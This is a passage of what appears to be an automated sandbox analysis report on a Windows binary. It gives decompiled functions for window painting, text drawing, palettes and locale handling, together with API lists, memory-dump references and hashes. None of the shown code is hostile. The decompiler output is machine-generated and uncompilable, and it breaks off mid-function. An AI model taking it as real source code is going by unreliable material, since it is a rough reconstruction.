                                                                        0x0043a988
                                                                        0x0043a98e
                                                                        0x0043a993
                                                                        0x0043a9a7
                                                                        0x0043a9a7
                                                                        0x0043a9ab
                                                                        0x0043a9ac
                                                                        0x0043a9b1
                                                                        0x0043a9b4
                                                                        0x0043a9c1
                                                                        0x0043a9db
                                                                        0x0043a9de
                                                                        0x0043a9f1
                                                                        0x0043a9f4
                                                                        0x0043a9f6
                                                                        0x0043a9f7
                                                                        0x0043a9f9
                                                                        0x0043aa04
                                                                        0x0043aa0d
                                                                        0x0043aa1f
                                                                        0x00000000
                                                                        0x0043aa21
                                                                        0x0043aa3d
                                                                        0x0043aa44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043aa44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043aa46
                                                                        0x0043aa46
                                                                        0x0043aa47
                                                                        0x0043aa47
                                                                        0x0043a9f9
                                                                        0x0043aa4a
                                                                        0x0043aa4e
                                                                        0x0043aa57
                                                                        0x0043aa57
                                                                        0x0043aa62
                                                                        0x0043a9c3
                                                                        0x0043a9ca
                                                                        0x0043a9ca
                                                                        0x0043aa6e
                                                                        0x0043aa75
                                                                        0x0043aa78
                                                                        0x0043aa7b
                                                                        0x0043aa80
                                                                        0x0043aa87
                                                                        0x00000000
                                                                        0x0043aa96
                                                                        0x0043aa9b

                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                        • SaveDC.GDI32(?), ref: 0043A9D6
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043AA38
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AA62
                                                                        • EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 3808407030-0
                                                                        • Opcode ID: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction ID: 981de1faad7e270c48b42c82777b4bfcd2244b1cbce74977eaa2f3e787f6203c
                                                                        • Opcode Fuzzy Hash: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction Fuzzy Hash: 70417F71A002049FDB00EF99C984FAEB7F9EF4C304F2590AAE544AB362D7399D51CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00467AF0, Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E00467AF0(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041FD6C( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E00404600(__ecx);
					_t19 = E004047F8(__ecx);
					return DrawTextA(E00420730(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E00404600(_t60);
				_t33 = E004047F8(_t60);
				DrawTextA(E00420730(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E00404600(_t60);
				_t45 = E004047F8(_t60);
				return DrawTextA(E00420730(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}
















                                                                        0x00467aff
                                                                        0x00467b00
                                                                        0x00467b01
                                                                        0x00467b02
                                                                        0x00467b03
                                                                        0x00467b05
                                                                        0x00467b07
                                                                        0x00467b0f
                                                                        0x00467b18
                                                                        0x00467ba0
                                                                        0x00467ba0
                                                                        0x00467baa
                                                                        0x00467bb2
                                                                        0x00000000
                                                                        0x00467bc0
                                                                        0x00467b26
                                                                        0x00467b33
                                                                        0x00467b44
                                                                        0x00467b4c
                                                                        0x00467b5a
                                                                        0x00467b67
                                                                        0x00467b74
                                                                        0x00467b83
                                                                        0x00467b8b
                                                                        0x00000000

                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00467B26
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B5A
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00467B67
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B99
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction ID: 216688b682b8187a4d0dd2772e2fd5db348bcfabf5300b79facba910a8da82e7
                                                                        • Opcode Fuzzy Hash: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction Fuzzy Hash: 5921A4B1B0412967CB00FB6A9C81E9F72AD9F45328B11053EB918F7282DA7DE80547AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045620C, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045620C(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x496714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E004334C0(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043CC2C(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                        0x0045620c
                                                                        0x00456210
                                                                        0x00456212
                                                                        0x00456214
                                                                        0x00456216
                                                                        0x0045621e
                                                                        0x004562bd
                                                                        0x004562c3
                                                                        0x0045622f
                                                                        0x00456234
                                                                        0x00456238
                                                                        0x0045629e
                                                                        0x004562bb
                                                                        0x004562bb
                                                                        0x00000000
                                                                        0x0045629e
                                                                        0x0045623a
                                                                        0x0045623c
                                                                        0x0045623c
                                                                        0x00456241
                                                                        0x0045625c
                                                                        0x00456265
                                                                        0x0045625a
                                                                        0x00000000
                                                                        0x0045625a
                                                                        0x0045626d
                                                                        0x0045626f
                                                                        0x0045626f
                                                                        0x00000000
                                                                        0x0045624b
                                                                        0x00456250
                                                                        0x00456271
                                                                        0x0045628a
                                                                        0x0045628c
                                                                        0x0045628c
                                                                        0x00000000
                                                                        0x0045628a
                                                                        0x00456241

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$CaptureLongWindow
                                                                        • String ID:
                                                                        • API String ID: 1158686931-0
                                                                        • Opcode ID: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction ID: 5d2c23152084b1fa4b612b1933836b5cb434e24660daf083a54e060d56ea4212
                                                                        • Opcode Fuzzy Hash: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction Fuzzy Hash: 351181712046095FDA20BA99C980E5373DCDB25315F5204BAFD5AD7353EB2DFC084768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424C34, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00424C34(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E004235B4(_t22);
					}
					_t21 = E00421218( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E00420B28(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                        0x00424c34
                                                                        0x00424c38
                                                                        0x00424c3a
                                                                        0x00424c41
                                                                        0x00424c5b
                                                                        0x00424c61
                                                                        0x00424c63
                                                                        0x00424c63
                                                                        0x00424c7a
                                                                        0x00424c7f
                                                                        0x00424c81
                                                                        0x00424c86
                                                                        0x00424c94
                                                                        0x00424c9a
                                                                        0x00424cc3
                                                                        0x00424cc3
                                                                        0x00424c9c
                                                                        0x00424c9f
                                                                        0x00424cbd
                                                                        0x00000000
                                                                        0x00424cbf
                                                                        0x00424cbf
                                                                        0x00424cbf
                                                                        0x00424cbd
                                                                        0x00424cc5
                                                                        0x00424cca
                                                                        0x00424cd2
                                                                        0x00424cd2
                                                                        0x00424cd8
                                                                        0x00424ce1
                                                                        0x00424ce3
                                                                        0x00000000
                                                                        0x00424ce3
                                                                        0x00424ce1
                                                                        0x00424c86
                                                                        0x00424ceb

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00424C8A
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                        • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                        • ReleaseDC.USER32 ref: 00424CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                        • String ID:
                                                                        • API String ID: 2404249990-0
                                                                        • Opcode ID: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction ID: b38cbdc5d7d635c132f023a64b9ee6869dab09140c7ce5dbab682903523af89d
                                                                        • Opcode Fuzzy Hash: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction Fuzzy Hash: 8611A2217026799ADB20EF2AE4417EA3AD0EF91359F420126F9009B781D7B89994C3A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00453968, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E00453968(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x47aafc != 0) {
					_t16 = E0043CF30(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E0043CC2C(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E0043CC2C(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0x47aafc(E0043CC2C(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x0047AB80 |  *0x0047AB88);
						} else {
							SetWindowLongA(E0043CC2C(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E0043CC2C(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}






                                                                        0x00453968
                                                                        0x0045396a
                                                                        0x00453970
                                                                        0x00453985
                                                                        0x0045398c
                                                                        0x004539a1
                                                                        0x004539aa
                                                                        0x004539bb
                                                                        0x004539ce
                                                                        0x004539ce
                                                                        0x00000000
                                                                        0x00453a10
                                                                        0x00453a21
                                                                        0x00000000
                                                                        0x00453a37
                                                                        0x004539aa
                                                                        0x0045398c
                                                                        0x00453a3e

                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 0045399C
                                                                        • SetWindowLongA.USER32 ref: 004539CE
                                                                        • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A08
                                                                        • SetWindowLongA.USER32 ref: 00453A21
                                                                        • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayeredRedraw
                                                                        • String ID:
                                                                        • API String ID: 1758778077-0
                                                                        • Opcode ID: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction ID: f4d5327cf6d9d13d20f65eb046940501b950165327f161f479efa226d41080df
                                                                        • Opcode Fuzzy Hash: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction Fuzzy Hash: 6911AB60A042902AEB10BE794CC9B4B3A494B09356F142D7ABD99EB2C3C67CCC49C76D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041D31C, Relevance: 7.6, APIs: 5, Instructions: 60registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0041D31C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x496714; // 0x400000
				 *0x47a4d0 = _t6;
				_t8 =  *0x47a4e4; // 0x41d30c
				_t9 =  *0x496714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x496714; // 0x400000
						_t20 =  *0x47a4e4; // 0x41d30c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x47a4c0);
				}
				_t13 =  *0x496714; // 0x400000
				_t14 =  *0x47a4e4; // 0x41d30c
				_t22 = CreateWindowExA(0x80, _t14, 0x41d3cc, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041D260(_a4, _a8));
				}
				return _t22;
			}














                                                                        0x0041d323
                                                                        0x0041d328
                                                                        0x0041d331
                                                                        0x0041d337
                                                                        0x0041d33d
                                                                        0x0041d345
                                                                        0x0041d347
                                                                        0x0041d34a
                                                                        0x0041d358
                                                                        0x0041d35a
                                                                        0x0041d360
                                                                        0x0041d366
                                                                        0x0041d366
                                                                        0x0041d370
                                                                        0x0041d370
                                                                        0x0041d377
                                                                        0x0041d393
                                                                        0x0041d3a3
                                                                        0x0041d3aa
                                                                        0x0041d3bb
                                                                        0x0041d3bb
                                                                        0x0041d3c6

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                        • String ID:
                                                                        • API String ID: 3404767174-0
                                                                        • Opcode ID: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction ID: 74b4939fce1307e55b377de450ca8e826035f92d8163aee15a1af6e20c356675
                                                                        • Opcode Fuzzy Hash: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction Fuzzy Hash: 2C0184B1B041046BCB10EBA8DD85F9E33ACE749308F114177FD18E72D1D67AA9948B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421180, Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E00421180(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x496a28 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x421206);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x496a28; // 0xb7080776
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x496a28; // 0xb7080776
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x42120d);
					return ReleaseDC(0, _v12);
				}
			}












                                                                        0x00421181
                                                                        0x00421183
                                                                        0x00421187
                                                                        0x00421189
                                                                        0x00421194
                                                                        0x00421214
                                                                        0x00421196
                                                                        0x0042119d
                                                                        0x004211a2
                                                                        0x004211a3
                                                                        0x004211a8
                                                                        0x004211ab
                                                                        0x004211bc
                                                                        0x004211c6
                                                                        0x004211cc
                                                                        0x004211de
                                                                        0x004211e4
                                                                        0x004211e9
                                                                        0x004211e9
                                                                        0x004211ef
                                                                        0x004211f2
                                                                        0x004211f5
                                                                        0x00421205
                                                                        0x00421205

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00421198
                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 004211B4
                                                                        • GetPaletteEntries.GDI32(B7080776,00000000,00000008,?), ref: 004211CC
                                                                        • GetPaletteEntries.GDI32(B7080776,00000008,00000008,?), ref: 004211E4
                                                                        • ReleaseDC.USER32 ref: 00421200
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: EntriesPalette$CapsDeviceRelease
                                                                        • String ID:
                                                                        • API String ID: 3128150645-0
                                                                        • Opcode ID: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction ID: 2e08d2bdc4763a876f0246fa622096bae7d75537cc4679951bf392552e8ebcb6
                                                                        • Opcode Fuzzy Hash: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction Fuzzy Hash: A2110871648344AEEB00CBE59C42F697BECE719714F5180A7F504EA2C1DA7BA454C728
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00462FB4, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00462FB4(void* __eax) {
				struct HDC__* _v8;
				int _t13;
				void* _t25;
				intOrPtr _t32;
				int _t35;
				intOrPtr _t37;
				intOrPtr _t39;

				_t37 = _t39;
				_t25 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_v8 = GetDC(0);
					_push(_t37);
					_push(0x463039);
					_push( *[fs:eax]);
					 *[fs:eax] = _t39;
					_t13 = GetDeviceCaps(_v8, 0x5a);
					_t35 = MulDiv(E0041F6E8( *((intOrPtr*)(_t25 + 0x68))), _t13, 0x48);
					 *(_t25 + 0x2b0) = _t35;
					E004609B0(_t25, MulDiv(_t35, 0x78, 0x64));
					 *((intOrPtr*)(_t25 + 0x2e4)) =  *((intOrPtr*)(_t25 + 0x234));
					_pop(_t32);
					 *[fs:eax] = _t32;
					_push(0x463040);
					return ReleaseDC(0, _v8);
				}
			}










                                                                        0x00462fb5
                                                                        0x00462fba
                                                                        0x00462fc3
                                                                        0x00463044
                                                                        0x00462fc5
                                                                        0x00462fcc
                                                                        0x00462fd1
                                                                        0x00462fd2
                                                                        0x00462fd7
                                                                        0x00462fda
                                                                        0x00462fe5
                                                                        0x00462ff9
                                                                        0x00462ffb
                                                                        0x0046300f
                                                                        0x0046301a
                                                                        0x00463022
                                                                        0x00463025
                                                                        0x00463028
                                                                        0x00463038
                                                                        0x00463038

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00462FC7
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 00462FE5
                                                                          • Part of subcall function 0041F6E8: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F6F9
                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462FF4
                                                                        • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00463006
                                                                        • ReleaseDC.USER32 ref: 00463033
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDeviceRelease
                                                                        • String ID:
                                                                        • API String ID: 127614599-0
                                                                        • Opcode ID: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction ID: 8a975a19c502e7ba5fed77ab0f9ea342d1e76ffa1a8a0f0d302a6746974fb504
                                                                        • Opcode Fuzzy Hash: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction Fuzzy Hash: DE01D2717483406FE700EF658C46B5A77DCDB09715F1100B6F908EB2C2DA795D008768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409C5C, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E00409C5C(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409cf3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E004099D4(GetThreadLocale(), 0x409d08, 0x100b,  &_v8);
				_t29 = E004087C0(0x409d08, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409BA8, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49681c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409BE4, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
